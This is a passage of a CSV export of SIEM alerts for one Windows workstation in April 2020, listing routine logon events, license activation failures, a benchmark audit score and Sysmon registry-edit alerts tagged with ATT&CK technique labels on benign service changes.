+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DE8 + Linked Logon ID: 0xC6DC8 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. 
+ - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:40.376",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DC8 + Linked Logon ID: 0xC6DE8 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:27.719",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. 
+ +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:24.592",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 11:01:24.562",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 24, 2020 @ 11:01:24.483",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: 
+RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 11:01:19.376",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 11:01:18.546",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 11:01:18.423",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. 
+ +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:18.343",3,"The database engine attached a database",,"""SearchIndexer (4876,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00C6:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.011929 -0.011680 (1) WT +J(0) +M(C:0K, Fs:27, WS:40K # 0K, PF:40K # 0K, P:40K) +[3] 0.029535 -0.024821 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:39, WS:120K # 0K, PF:140K # 0K, P:140K) +[4] 0.000112 +J(0) +[5] - +[6] - +[7] - +[8] 0.002042 -0.000587 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:54, WS:212K # 0K, PF:664K # 0K, P:664K) +[9] 0.049637 -0.000126 (5) CM -0.049307 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 132K, P:256K) +[10] 0.000127 -0.000057 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 8K, PF:96K # 96K, P:96K) +[11] 0.000011 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000031 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) 
+M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000003 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 11:01:18.266",3,"The database engine is starting a new instance",,"""SearchIndexer (4876,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 11:01:16.298",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 11:01:15.884",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.936877900Z"",""eventRecordID"":""944"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:06.052\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:06.052"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:06.052 +ProcessGuid: 
{df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:15.553",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.810432400Z"",""eventRecordID"":""938"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 
11:01:15.479",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.810229500Z"",""eventRecordID"":""937"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_376ac\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_376ac\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_376ac\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 11:01:15.444",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.809446200Z"",""eventRecordID"":""936"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:15.415",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.809166400Z"",""eventRecordID"":""935"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:15.362",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.785543400Z"",""eventRecordID"":""934"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_376ac\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:15.111",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.785217200Z"",""eventRecordID"":""933"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.814",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.783915000Z"",""eventRecordID"":""932"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 11:01:14.698",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.783593200Z"",""eventRecordID"":""931"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_376ac\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_376ac\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:14.523",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.777295100Z"",""eventRecordID"":""930"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:14.269",9,"ATT&CK T1058:Registry edit for new 
